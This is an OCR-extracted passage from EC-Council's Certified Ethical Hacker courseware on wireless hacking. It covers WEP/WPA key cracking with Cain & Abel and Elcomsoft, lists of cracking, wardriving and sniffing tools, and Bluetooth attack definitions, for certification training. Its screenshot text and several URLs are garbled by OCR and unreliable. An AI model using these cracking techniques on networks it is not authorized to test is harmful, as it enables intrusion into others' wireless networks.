ig n a l s e n tB y te s r e c v .B y te s IPA d d re s s V e n d o r S 2 2 8 6u n k n o w n u n k n o w n 0 8 0 u n k n o w n O B 2 2 8 6u n k n o w n 0 u n k n o w n 1 9 0 8u n k n o w n 0 0 6 u n k n o w n 2 2 8 8u n k n o w n 0 0 8 2 6 6 8u n k n o w n u n k n o w n O B 0 u n k n o w n 1 9 0 8u n k n o w n 0 0 6 u n k n o w n 2 6 6 6u n k n o w n 0 0 8 u n k n o w n 2 6 6 8u n k n o w n 0 0 6 u n k n o w n 2 6 6 8u n k n o w n 0 0 8 u n k n o w n 2 6 6 8u n k n o w n 0 0 8 u n k n o w n 1 5 2 6u n k n o w n 0 0 8 u n k n o w n 0 6 1 9 0 8u n k n o w n 0
Weak Scheduling Attack Bruteforce against 40-bit Apple Key against 104-bit Apple Key against 104-bit MD5 Key

4 4 1 0 6 1 P a c k e ts 3 7 S 5 0 3 D a taP a c k e ts M a n a g e m e n tP a c k !6 S 5 S 8 C o n tro lP a c k e ts 0 2 5 3 7 9 1 U m q u eiv s 1 0 0 In j. P a c k e ts B y te s 5 67 3 M i8 < u n r e s o » v e d > K e y < u n r e s 0 < v e d > A S C II K e y 0 0 0 0 0 0 L a s tfV N oE le v a tio nD a ta

2 6 6 8u n k n o w n 2 6 6 8u n k n o w n 6 2 4 8u n k n o w n 2 2 8 8u n k n o w n 1 5 2 8u n k n o w n 2 6 6 8u n k n o w n 1 9 0 8u n k n o w n 2 2 8 8u n k n o w n 2 6 6 8u n k n o w n 2 6 6 8u n k n o w n 2 6 6 8u n k n o w n 2 6 6 8u n k n o w n 2 6 6 8u n k n o w n ..? 7 JB B .u n k n o w n
Start Scan 9

FIGURE 15.67: KisMAC screenshot

Module 15 Page 2316

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

WEP C racking Using Cain & Abel

CEH
Urt«fW< ItlMul NM kM

W EPK/s 1702528 Korek's Attacks‫־‬ W A_u15 W A_s13 A_u13_1 K3 W A_u13_2 W A_u13_3 W A_s5_1 F

Fudge Factor

- Last KB Brute-Focce---z i | last key byte r r ate
bci

| 2
A_s5_2 W A_s5_3 W A_u5_1 (v o te ) 2 7 7 )4 7 ( 2 8 0 )8B( 2 4 9 )5 8 ( 2 3 5 )4 7 ( 196 ) B E ‫(׳‬ 3 1 4 )3 E( 18b) 8 E( 272 )5B( 1 1 0 )1 8 ( 6 8 4 )6 4 ( 2 8 0 )2 D ( 326 )7B(

W E P Cracker utility in Cain implem ents statistical cracking and P T W cracking m ethods for the recovery of a W E P Key

W A_u5_2 W A_u5_3 W A_u5_4

W A_s3 W A_4_:13 W A_4_u5_1

P F

s s 7 3 9 13

0 1 2 1
3

1 1

D e p th / / / / / / / / / / / /

0 0 0 0 0 0 0 0 0 0 0 0

1 1 1 1 1 1 1 1 1 1 1 1 1

B y te C( F( S3( 61( C( E( 65( 74( bB( 65( 79( 30(

6 6

6 6

1 3 )2 1 ( 2 7 )1 3 ( 1 5 )8 6 ( 2 8 )B 8 ( 2 4 )9 9 ( 4 5 )4 1 ( 2 7 )C 9 ( 3 9 )3 1 ( 2 6 )B 2 ( 2 4 )D4( 3 0 )0 1 ( 8 1 ) O E(

1 2 )9 7 ( 2 4 )C C ( 1 5 )2 8 2 8 )3 6 ( 1 5 )6 8 2 8 )D 2 ( 2 5 ) 5A ( 8 )C C ( 1 5 )0 6 ( 1 5 )E B ( 3 0 )3 1 ( 4 1 )1 C (

2

1 2 )0 5 ( 1 5 )9 C ( 1 5 )9 F ( 2 4 )0 1 ( 1 3 ) 8D( 2 4 )1 8 ( 1 5 )7 D ( 25)0 B ( 1 5 )6 1 ( 1 5 )1 2 ( 2 8 )7 7 ( 3 9 )A 5 (

0 )F 0 ( 1 2 )9 D ( 1 2 )3 9 ( 1 5 )D O ( 1 3 )5 7 ( 1 5 )4 0 ( 1 3 )E 3 ( 1 5 )E C ( 1 S )4 D ( 1 5 )F 6 ( 2 4 )F 0 ( 2 8 )1 9 (

UEP Key

fo u n d

A S C I I : l o c o I n c > tkoy0 3 H sx 6 C 6 F6 3 6 1 6 C 6 E 6 5 7 4 6 B 6 5 7 9 3 0 3 0

http://www.oxid.it

Copyright © b y IG -C O H C il. All Rights Reserved. Reproduction is Strictly Prohibited.

I ^ j WEP C racking Using Cain & Abel
1
*

Source: http://www.oxid.it

Cain & Abel is a password recovery tool for Microsoft operating systems. The WEP Cracker utility in Cain implements statistical cracking and the PTW cracking method for the recovery of a W EP key. This tool even allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords using dictionary, brute-force and cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords, and analyzing routing protocols. The latest version includes a new feature, APR (ARP Poison Routing), which enables sniffing on switched LANs and man-in-the-middle attacks. The sniffer in this version can also analyze encrypted protocols such as SSH-1 and HTTPS, and contains filters to capture credentials from a wide range of authentication mechanisms.

Module 15 Page 2317

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Korek's W EP A ttack
K ey s tested 50 \ I/C IV/‫״‬. W LP r IVs 1702528 Korek's A tta ck s 17 A _u 1 5 17 A _s 1 3 17 A u13 1 17 A _u 1 3 _2 ( 7 A _u 1 3 _3 [ 7 A_s5 _1 (7 A _s5_2 17 A _ s 5 _ 3 F A u5 1 |7 A _u 5 _2 17 A _ u 5 _ 3 F A u5 4 [7 A _s3 17 A _4 _s 1 3 I? A 4 u5 1 17 A _ 4 _ u 5 _ 2 17 A _ n e g W E P K e y Length 1128 bits Fu d ge Factor [2 ‫־‬ d 2 ] Initial part 01 the k ey (Hex)

*I 1
1 I'D L W INO O IW C T U ILC | last k ey byte IIalfa-numeric keys only B C D hex digits only

KB 0 1 2 3 4 5 6 7 8 9 10 11

Depth 0/ 0/ 0/

0/
0 0 0 0 0 0 0 0 / / / / / / / /

1 1 1 1 1 1 1 1 1 1 1 1 !

Byte 6C( 6F ( 63( 61( 6C( 6E( 65( 74( 6B( 65( 79( 30(

(vote) 277)47( 2 8 0 ) 8B( 249)58( 235)47( 196)B5( 3 1 4 ) 3E( 1 8 6 ) 8E( 2 7 2 ) 5B( 110)18( 684)64( 280)2D( 3 2 6 ) 7B(

13)21( 27)13( 15)86( 28)B8( 24)99( 45)41( 27)C9( 39)31( 26)B2( 2 4 )D4( 30)01( 8 1 ) 0E(

12)97( 2 4 )CC( 15)28( 28)36( 15)68( 28)D2( 2 5 ) 5A( 2 8 )CC( 15)06( 1 5 )EB( 30)31( 41)1C(

12)05( 1 5 ) 9C( 1 5 ) 9F( 24)01( 1 3 ) 8D( 24)18( 1 5 ) 7D( 2 5 ) 0B( 15)61( 15)12( 28)77( 39)A5(

0 )F0 ( 1 2 )9D( 12)39( 1 5 )DO( 13)57( 15)40( 13)E3( 1 5 )EC( 1 5 ) 4D( 15)F6( 24)F0( 28)19(

0) 8) 0) 15) 12) 15) 13) 13) 13) 15) 15) 24)

1 o c a 1 n e t k e y 0

WEP K e y

found

ASCII: l o c a l n e t k e y 00 Hex: 6C6F63616C6E65746B65793030

Start

Exit

FIGURE 15.68: Screenshot showing WEP Cracking Using Cain & Abel
P TW WEP A ttack
C r a c k in g WEP H e *: K ey 128 fo u n d b i t ! k e y ( d o n e )

x]

A S C I I :

lo c a ln e tk e y O O

6 C 6 F 6 3 6 1 6 C 6 E 6 5 7 4 6 B 6 5 7 9 3 0 3 0 s to p p e d .

A t t a c k

Start

Cancel

FIGURE 15.69: Recovering WEP key using PTW cracking method

Module 15 Page 2318

Ethical Hacking and Countermeasures Copyright © by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

I

WPA Brute Forcing Using Cain & Abel
\ Source: http://www.oxid.it Cain can recover passwords by sniffing the wireless network and crack WPA-PSK encrypted passwords using dictionary and brute-force attacks. Its new version also ships routing protocols, authentication monitors and routes extractors, dictionary and brute-force crackers for all common hashing algorithms and for several specific authentications, password/hash calculators, cryptanalysis attacks, password decoders, and some not so common utilities related to network and system security.

Module 15 Page 2319

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

WPA Cracking Tool: Elcomsoft W ireless Security Auditor
W* k W " O ftiW ‫״‬ S Cette pc jW Hflp A Cf«n prqec! * £ j project H i Start attack Pause atiack & Check lot updates 9 Help corterts

CEH

J

Elcom soft W ireless Security Auditor allows netw ork administrators to audit accessible w ireless netw orks

£ Inptit Si•-•

irtonjnes loal: rrtto p ‫׳‬ ^ Cvcn: speed p sw rt

1 Or Od 0tc0-rcA6\ ITS 72*) aagiectopu

OKtonann left: Tne left: Average % > e e3 : Proccjsorload: en#6t1<x 3%‫־‬

a Oy Od O h Jlm Jls 123 706 S7*to

J

It com es w ith a built-in w ireless ne tw o rk sniffer (with AirPcap adapters)

J

It tests the strength of W PA /W P A 2 - PSK passwords protecting your wireless network
Chann* 6 10 11 11 11 6 1 ‫נ‬ BSE t f V f l P ■ ■ m m m tm m m m warn m m ■ ■ mm mm m u mm m m m m m M M |n ■ 1 ■ E H ■■■ ■ ■ 1 Beacons 352 37 254 257 129 0 Data 1116 56 0 0 0 ‫נ‬ 0 0 Ptxm •56 •76 -63 -66 •75 -70 •78 •76 S«**d 54 46 54 54 54 •1 46 46 Snaypton W PA WPA OPEN WEP or Vfi>A VJ£P v W PA W EP or W PA W EP O fW PA

2 2

http://www.elcom soft.com
Copyright © b y iC - C 0 H C il. All Rights Reserved. Reproduction is Strictly Prohibited.

, WPA C racking Tool: Elcomsoft W ireless Security Auditor
Source: http://www.elcomsoft.com Elcomsoft Wireless Security Auditor allows you to verify the security of a company's wireless network by executing an audit of accessible wireless networks. It comes with a built-in wireless network sniffer (with AirPcap adapters). It attempts to recover the original WPA/WPA2-PSK text passwords in order to test how secure your wireless environment is.
Elcomsoft Wireless Security Audito^B
FJe Action Options Help

£ Import d a t a

»

a C r e a t e p r o j e c t

ti
Cpen p r o j e c t • Save p r o j e c t

ti
S t a r t a t t a c k

/£ Pause a t t a c k

9
Check f o r updates

o Help c ont ent s

I

O c D o r v a n e st o t a l : T i m ee l a p s e d : CuTent s p e e d : l a s tp a s s w o r d :

Oy Od

0 M > m :4 6 t

17S 779 o n g ic r io p u

Octonanesl e f t : Tme l e f t : Average s p e e d : P r o c e s s o rt o a d :
er>S*sK<Jc - 3 %

O yO d

O h Jl m ; ) U

123 708

57H ,

Module 15 Page 2320

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W ireless listener is in progress

_____

Access Points

Use Selected

C w cd

1

FIGURE 15.70: Elcomsoft Wireless Security Auditor screenshot

Module 15 Page 2321

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

WEP/WPA Cracking Tools
o h ttp :/ / w e p a t t a c k .s o u r c e f o r g e .n e t
WepAttack

C.il.fwd

c EH
tt*H4i Nath*

(f)

h t t p :/ / w w w .s e c p o in t.c o m

Portable Penetrator

h ttp :/ / w w w .a ir c r a c k n g .o r g

Wesside-ng

h tt p s :/ / w w w .c lo u d c r a c k e r .c o m

CloudCracker

‫מ‬
1

h ttp :/ / w w w .a ir c r a c k n g .o r g

Aircrack-ng

h t t p :/ / w ir e le s s d e fe n c e .o r g

coWPAtty

h ttp :/ / w e p c r a c k .s o u r c e f o r g e .n e t

WEPCrack

h t t p :/ / c o d e ,g o o g le ,c o m

Wifite

h t t p :/ / w e p d e c r y p t .s o u r c e f o r g e .n e t

WepDecrypt

h ttp :/ / w w w .p ts e c u r ity .r u

WepOff

Copyright © b y IG -G O H C il. All Rights Reserved. Reproduction is Strictly Prohibited.

W EP/W PA Cracking Tools
WEP/WPA cracking tools are used for breaking 802.11 WEP secret keys. These tools recover a 40-bit, 104-bit, 256-bit, or 512-bit W EP key once enough data packets have been captured. A few tools guess WEP keys based on an active dictionary attack, key generator, distributed network attack, etc. The following are a few WEP/WPA Cracking tools used by attackers: 9 9 9 9 9 9 9 9 9 9 WepAttack available at http://wepattack.sourceforge.net Wesside-ng available at http://www.aircrack-ng.org Aircrack-ng available at http://www.aircrack-ng.org WEPCrack available at http://wepcrack.sourceforge.net WepDecrypt available at http://wepdecrvpt.sourceforge.net Portable Penetrator available at http://www.secpoint.com CloudCracker available at https://www.cloudcracker.com coWPAtty available at http://wirelessdefence.org Wifite available at http://code.google.com WepOff available at http://www.ptsecuritv.ru

Module 15 Page 2322

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Module Flow

C EH

So far, we have discussed various wireless concepts, wireless encryption, threats, and hacking methodology. Now we will discuss wireless hacking tools. Wireless hacking can also be performed with the help of tools. The wireless hacking tools make the attacker's job easy. This section covers various Wi-Fi sniffers, wardriving tools, RF monitoring tools, Wi-Fi traffic analyzers, etc.

JT

M odule Flow

Wireless Concepts

t < /*

Wireless Encryption

^

Wireless Threats

| ‫ ||||ן‬Wireless Hacking Methodology

m

Wireless Hacking Tools

^
^— —
V‫׳‬

Bluetooth Hacking

Countermeasure

0‫כ‬
Wi-Fi Pen Testing
Module 15 Page 2323

Wireless Security Tools

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi Sniffer: K ism et
J It is an 802.11 Layer2 w ireless ne tw o rk detector, sniffer, and intrusion d etection system J It identifies n etw orks by passively collecting packets and detecting standard nam ed netw orks J It detects hidden n etw orks and presence of nonbeaconing n etw orks via data traffic
K ism t S ort Vi«w Windows Nm • BSSID TC TRBCnet 00:14:01:5 f :97:12 A 0 linksys_SES_45997 0 0 :16:86:18:E4:FF A 0 la n d sc a p e s linfcsys Autogroup Probe TFS ■eskas Xu Chen TK421 Eline-PC-W ireless P ickles 00:14 BF:07:2f •4 0 0 :1A:70:0 9 :K : 13 00 1F.90:E6 EO 84 00 1F 90FA.F4 Cl 00:13 E8:9 2 :3FC8 00:09 56:07 :90 82 00 18:01:F5 65E1 00:18:01:F9:70:F0 00:18:01:F E 6 8 7 7 00:24 B 2 0 E E 6 E 2 00 IF 90 E4 04 F1 00:1F:33:F3:C5:4A AN AN AW AM P N AN A0 AN A0 A cf AW j A0 1 2417 6 2447 6 2437 6 2437 11 2462 ‫ •־‬2412 ............. 11 2462 11 2462 6 2442 6 2442 Pkts Si • 1 08 2 08 08 08 4 S 08 08 9 08 10 08 13 08 17 OB 19 OB 23 OB ............. ............. ............. ............. ............. ............. ............. ............. ............. ............. .............

(•rtifwtf

CEH
itfciul Nm Im

2 Bcnft S i• C lnt Manuf Ctv SMn 1 Tr*nd*ar«I — wlanO .............
1 Cisco-Link - - - wlanO 1 1 1 1 1 1 1 1 1 C sco-Link Cisco-Link A ctlortecE ActiontacE IntolCorpo N«tg«ar ActiontocE ActiontccE ActiontocE

1

••• ■lanO — wlanO --■lanO ••• wlanO ■lanO US «lanO US *lanO ■lanO wlanO ■lanO

I I

N oG P Sin fo (G P Sn o tc o n n o c to d )

*

‫י‬

No ip d a t• f r o • GPSO in 15 seconds or ■or•, a ttM p tin g to rocormoct No ip d a t• fro■ GPSD in 1S soconds or ■ore. a ttM p tin g to roconnoct

: Could not comoc t t o th • spoctools s«rv«r lo c a lh o s t:30569 : No updat• fro■ GPSO in 15 soconds or ■oro. a ttM p tin g to roconnoct No updat• fro■ GPSO in 15 soconds or ■or•. a ttM p tin g to roconnoct

http://www.kismetwireless.net

Copyright @ b y EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

W i-Fi Sniffer: Kism et
Source: http://www.kismetwireless.net Kismet is an 802.11 Iayer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card that supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, 802.lln , and 802.l l g traffic (devices and drivers permitting). It identifies networks by passively collecting packets and detecting standard named networks, detecting (and given time, decloaking) hidden networks, and inferring the presence of nonbeaconing networks via data traffic.

Module 15 Page 2324

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

K is M t S o rt View Windows TRENDnet lin k jy s SES 4 5 9 9 7 OQf 9 3 landscape‫! ׳‬ lin k sy s MPA4 1 6 S I0 3 Autogroup Probe TFS meskas Xu Chen 1 X4 2 1 Elina-PC -W ireless
7 J4 R 0

P ic k le s

00: 1 4 : 01 :5 F : 97:12 A 0 12417 00: 1 6 : 86 :1 B :E 4 :FF A 0 6 2 4 4 7 00: I F :9 0 F2 CD:C2 A W 12412 00: 1 4 :B F : 07 :2 F :8 4AN 6 2 4 3 7 00: 1 A : 70 : 09 :BC :1 3AN 6 2 4 3 7 00: 1 F : 90 :E 6:E 0:84 A W 112462 0 0 IF 9 0 FA.F 4 C8 A M --- 2 4 1 2 00: 1 3 : E8: 92 :3 F:C 8 P N .............. 00: 09:58 07: 90:82 A N 1 12 4 6 2 00: 1 8 : 01 :F 5: 65 :E 1 A 0 1 12 4 6 2 00: 1 8 : 01 :F 9: 70 :FO A N 62442 00: 18:01: F E : 68:77 A 0 6 2 4 4 2 00: 24: B2: OE: E6: E2 A 0 * o n fi£ j r e 00: IF 9 0 E6. 04F 1 A W Naae 00: 1 F : 33 : F3 :C5: 4 A A 02 E Z 00: 16CE 07: 60:77 A W [ W E PU an u fI
C ) Lock Channels E
3S 59 3 A

1 2 4 5
S $

0 6 0 8
OB OB OB Ot

0 8 0 6 0 6 0 6 0 6 0 8
K ■

- -••• — —

... ...

...
... — ... ...

1 0 1 3 1 7 1 9 2 3

-‫־‬--* — — —

... ... ...

— --A ctio n tecE US 1 Cisco-Link — 1 Cisco-Lin k — 1 A ctio n tecE 1 A ctio n tecE — 1 IntelC orp o •*• ... 1 Netgear 1 A ctio n tecE US 1 A ctio n tecE US 1 A ctio n tecE —

1 Trendwarel 1 Cisco-Link

Charnel Chan

A

( Cancel ]

[ Change ]

No GPS in fo (GPS not connected) E 25: N 0uPdate [ g g E : No update r g g S : Could not No update [S 2 S i: N 0update f ron GPSD fron GPSD connect to fro■ GPSD fro■ GPSD in 1 5 seconds or •ore, attem pting to reconnect in 1 5 seconds or •ore, attem pting to reconnect the spectools server lo c a lh o s t :3 0 5 6 9 in 1 5 seconds or •ore, attem pting to reconnect in 1 5 seconds or ■ore, a tte a p tin g to reconnect

FIGURE 15.71: Kismet screenshot

Module 15 Page 2325

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

h t t p :/ / a ir c r a c k n g .o r g

airbase-ng

h t t p :/ / w w w .m a c s t u m b le r .c o m

MacStumbler

h t t p :/ / w w w .m o n 0lith 8 1. d e

ApSniff

h ttp :/ / w w w .th r e e ja c k s ,c o m

WiFi-Where

h t t p :/ / w w w .a s p e c t o s o f t w a r e .c o m

WiFiFoFum

*

h ttp :/ / a ir fa r t .s o u r c e fo r g e .n e t

AirFart

«?

h ttp :/ / w w w .n e t s t u m b le r .c o m

MiniStumbler

AirTraf

h ttp :/ / a ir tr a f.s o u r c e fo r g e .n e t

h t t p :/ / s o u r c e fo r g e .n e t

WarLinux

h t t p :/ / w a v e la n t o o ls .s o u r c e f o r g e .n e t

802.11 Network Discovery Tools

Copyright © b y IG -G O H C il. All Rights Reserved. Reproduction is Strictly Prohibited.

k- W ardriving Tools
Wardriving tools enable users to list all access points broadcasting beacon signals at their location. It helps users to set new access points, making sure there are no interfering APs. These tools even verify the network setup, find the locations with poor coverage in the WLAN, and detect other networks that may be causing interference. They detect unauthorized "rogue" access points in your workplace: 9 airbase-ng available at http://aircrack-ng.org 9 ApSniff available at http://www.monolith81.de 9 WiFiFoFum available at http://www.aspecto-software.com 9 MiniStumbler available at http://www.netstumbler.com 9 WarLinux available at http://sourceforge.net 9 MacStumbler available at http://www.macstumbler.com 9 WiFi-Where available at http://www.threejacks.com 9 AirFart available at http://airtraf.sourceforge.net 9 AirTraf available at http://airtraf.sourceforge.net 9 802.11 Network Discovery Tools available at http://wavelan-tools.sourceforge.net

Module 15 Page 2326

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

RF M onitoring Tools
h ttp :/ / p r o je c t s .g n o m e ,o r g
NetworkManager

CEH

h ttp :/ / w w w .w a v e n o d e .c o m

WaveNode

h t t p :/ / k w ifim a n a g e r .s o u r c e f o r g e .n e t

KWiFiManager

h t t p :/ / x o s v ie w .s o u r c e f o r g e .n e t

xosview

h ttp :/ / w w w .a r a c h n o id .c o m

NetworkControl

^

h tt p :/ / w w w .n e w s t e o .c o m

RF Monitor

h t t p :/ / k o r in o c o .s o u r c e f o r g e .n e t

KOrinoco

h t t p :/ / w w w .d e k t e c .c o m

DTC-340 RFXpert

h ttp :/ / w w w .t e k .c o m

Sentry Edge II

I PI
■‫־*־־‬

‫־־‬

h t t p :/ / s o lu t io n s .3 m .c o m

Home Curfew RF Monitoring System

Copyright © b y IG - C 0 H C il. All Rights Reserved. Reproduction is Strictly Prohibited.

L
‫י ד‬

J
‫־די‬

RF M onitoring Tools

Radio frequency (RF) monitoring tools help in discovering and monitoring Wi-Fi networks. These tools help you to control and monitor network interfaces, including wireless ones. They allow you to see network activity and help you to control network interfaces in a convenient way. A list of RF monitoring tools follows: e 9 9 e 9 NetworkManager available at http://proiects.enome.org KWiFiManager available at http://kwifimanager.sourceforge.net NetworkControl available at http://www.arachnoid.com KOrinoco available at http://korinoco.sourceforge.net/ Sentry Edge II available at http://www.tek.com

Q WaveNode available at http://www.wavenode.com 9 Q 9 9 xosview available at http://xosview.sourceforge.net RF Monitor available at http://www.newsteo.com DTC-340 RFXpert available at http://www.dektec.com Home Curfew RF Monitoring System available at http://solutions.3m.com

Module 15 Page 2327

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi Traffic Analyzer Tools
h ttp :/ / w w w .a r u b a n e t w o r k s .c o m
RFProtect Spectrum Analyzer p

CEH

h ttp :/ / u fa s o ft.c o m

Ufasoft Snif

h t tp :/ / w w w .flu k e n e t w o r k s .c o m

AirMagnet WiFi Analyzer

_

M

h ttp :/ / w w w .c a m b r id g e v x .c o m

vxSniffer

^

h t t p :/ / w w w .flu k e n e t w o r k s .c o m

OptiView® XG Network Analysis Tablet

h ttp :/ / w w w .flu k e n e t w o r k s .c o m QHB □ □C

OneTouch™ AT Network Assistant

h ttp :/ / w w w .ja v v in .c o m

Network Traffic Monitor 81 Analyzer CAPSA

h ttp :/ / w w w .c o la s o f t .c o m

Capsa Network Analyzer

h ttp :/ / w w w .n e t in s t.c o m

Observer

: ifnnl =IBB]

SoftPerfect Network Protocol Analyzer

Copyright © b y IG - C 0 H C il. All Rights Reserved. Reproduction is Strictly Prohibited.

W i-F i Traffic Analyzer Tools
Wi-Fi traffic analyzer tools analyze, debug, maintain, and monitor local networks and Internet connections for performance, bandwidth usage, and security issues. They capture data passing through your dial-up connection or network Ethernet card, analyze this data, and then represent it in an easily readable form. This type of tool is a useful tool for users who need a comprehensive picture of the traffic passing through their network connection or segment of a local area network. It analyzes the network traffic to trace specific transactions or find security breaches: 9 9 9 9 9 9 9 9 9 RFProtect Spectrum Analyzer available at http://www.arubanetworks.com AirMagnet WiFi Analyzer available at http://www.flukenetworks.com OptiView® XG Network Analysis Tablet available at http://www.flukenetworks.com Network Traffic Monitor & Analyzer CAPSA available at http://www.iavvin.com Observer available at http://www.netinst.com Ufasoft Snif available at http://www.ufasoft.com vxSniffer available at http://www.cambridgevx.com OneTouch™ AT Network Assistant available at http://www.flukenetworks.com Capsa Network Analyzer available at http://www.colasoft.com

Module 15 Page 2328

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

9

SoftPerfect Network Protocol Analyzer available at http://www.softperfect.com

Module 15 Page 2329

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi Raw Packet Capturing and Spectrum Analyzing Tools
Raw Packet C apturing Tools

CEH

Spectrum A nalyzing Tools
h ttp :/ / w w w .c is c o ,c o m
Cisco Spectrum Expert

lo
‫־‬ 5 ‫׳‬

h ttp :/ / w w w .n ir s o ft.n e t

WirelessNetView

Tcpdump
J

h t t p :/ / w w w .t c p d u m p .o r g

h t t p :/ / w w w .flu k e n e t w o r k s .c o m

AirMedic® USB

h ttp :/ / a ir v ie w .s o u r c e fo r g e .n e t

Airview

A
■ .

h t t p :/ / n u t s a b o u t n e t s .c o m

AirSleuth-Pro

h tt p :/ / w w w .n e t r e s e c .c o m

RawCap

M f \ ■ 5 ■p i 1 5 ^

'

h ttp :/ / w w w .b v s y s t e m s .c o m

BumbleBee-LX Handheld Spectrum Analyzer

‫י‬

h t t p :/ / w w w .a ir c r a c k n g .o r g

Airodump-ng

(# )

h t tp :/ / w w w .m e ta g e e k .n e t

Wi-Spy

Copyright © b y IG - C 0 H C il. All Rights Reserved. Reproduction is Strictly Prohibited.

W i-Fi Raw Packet Capturing and Spectrum Analyzing Tools
R a w P a c k e t C a p t u r in g T o o ls Raw packet capturing tools capture wireless network packets, and help you to visually monitor WLAN packet activities. These tools for Wi-Fi capture everypacket on the air and support both Ethernet LAN and 802.11 and display network traffic at theMAClevel. A few of these types of tools are listed as follows: 9 9 9 9 WirelessNetView available at http://www.nirsoft.net Tcpdump available at http://www.tcpdump.org Airview available at http://airview.sourceforge.net RawCap available at http://www.netresec.com

Q Airodump-ng available at http://www.aircrack-ng.org

S p e c t r u m A n a ly z in g T o o ls Spectrum analyzing tools are specially designed for RF Spectrum Analysis and Wi-Fi

Module 15 Page 2330

Ethical Hacking and Countermeasures Copyright © by EC-C0UllCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

troubleshooting. With the help of these tools, users can detect any RF activity in the environment, including detecting areas where RF interference impacts performance — ultimately resulting in user dissatisfaction due to slow connections or frequent disconnections. With this information, users can select the best channels for deploying Wi-Fi APs in the environment: 9 6 Cisco Spectrum Expert available at http://www.cisco.com AirMedic® USB available at http://www.flukenetworks.com

Q AirSleuth-Pro available at http://nutsaboutnets.com Q BumbleBee-LX Handheld Spectrum Analyzer available at http://www.bvsvstems.com

Q Wi-Spy available at http://www.metageek.net

Module 15 Page 2331

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Module Flow

CE H

M o d u l e F lo w
l!L— Bluetooth is a Wi-Fi service that allows sharing files. Bluetooth hacking allows an attacker to gain information of host from another Bluetooth-enabled device without the host's permission. With this type of hacking, the attacker can steal information, delete contacts from the victim mobiles, and extract personal files/pictures, etc. The different types of Bluetooth attacks and the tools that are used for performing such attacks are explained in following slides.

Wireless Concepts

^*

Wireless Encryption

^

Wireless Threats

| j| | |

Wireless Hacking Methodology

Wireless Hacking Tools

Bluetooth Hacking

Countermeasure H i

s

v‫— ׳‬

Wireless Security Tools

Module 15 Page 2332

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi Pen Testing

Module 15 Page 2333

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

B lu e to o th H a c k in g
J Bluetooth hacking refers to exploitation of B lu eto o th stack im p lem entation vu lnerabilities to com prom ise sensitive data in Bluetooth-enabled devices and networks J Bluetooth enabled devices connect and com m unicate wirelessly through ad hoc networks known as Piconets

Bluesmacking
DoS attack which overflows Bluetooth-enabled devices with random packets causing the device to crash

Bluejacking
The art of sending unsolicited messages over Bluetooth to Bluetooth-enabled devices such as PDA and mobile phones

Blue Snarfing
The theft of information from a wireless device through a Bluetooth connection

BlueSniff
Proof of concept code for a Bluetooth wardriving utility

Copyright © by IG-C0HCil. All Rights Reserved. Reproduction is Strictly Prohibited.

B lu e to o th H a c k i n g
